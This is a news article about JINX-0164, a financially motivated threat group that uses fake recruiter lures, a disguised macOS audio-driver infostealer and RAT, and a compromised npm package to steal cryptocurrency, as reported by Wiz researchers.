A previously unknown cyber threat group, identified as JINX-0164, has embarked on a malicious campaign targeting cryptocurrency companies. The group uses recruitment-themed social engineering tactics paired with custom macOS malware to facilitate the theft of digital assets.
Social Engineering and Malware Deployment
Researchers from Wiz, including Shira Ayal and Eden Abergil, have highlighted how JINX-0164 employs advanced social engineering strategies. By targeting employees through fake recruiter lures, the group gains access to internal systems. This includes moving from compromised laptops to critical code distribution networks and development infrastructures.
Operating under the observation of Google-owned cloud security teams, the group has been active since mid-2025. Their primary motivation appears to be financial, with a strong focus on exploiting developers to siphon cryptocurrency. A notable instance involved a supply chain attack, indicating the group’s sophisticated approach.
Technical Details of the Attack
JINX-0164 typically initiates contact through credible LinkedIn profiles, inviting victims to a virtual meeting. This meeting directs targets to a fraudulent domain posing as a teleconference service, where they are tricked into downloading malware.
The initial download retrieves a Python-based macOS infostealer and a remote access trojan named AUDIOFIX, executed via a bash script from a fake domain resembling a driver store. This payload, disguised as a system audio driver, is compatible with both Intel and Apple Silicon systems.
Data Breaches and Broader Implications
The malware enables the theft of sensitive data, including credentials from password managers and cryptocurrency wallet details. Additionally, AUDIOFIX supports various malicious commands, allowing for data exfiltration and further system compromises.
JINX-0164 also utilizes MiniRAT, a Go-based backdoor, distributed through a compromised npm package. This tool can upload files, execute shell commands, and fetch additional malicious payloads.
While some tactics resemble those of North Korean cyber groups, Wiz researchers have found no direct infrastructure links to confirm such connections.
Conclusion and Future Outlook
The activities of JINX-0164 underscore the evolving threat landscape for cryptocurrency firms. With sophisticated techniques and a clear financial motive, organizations are urged to enhance their cybersecurity measures. Continuous monitoring and awareness are crucial to mitigating such advanced threats in the future.
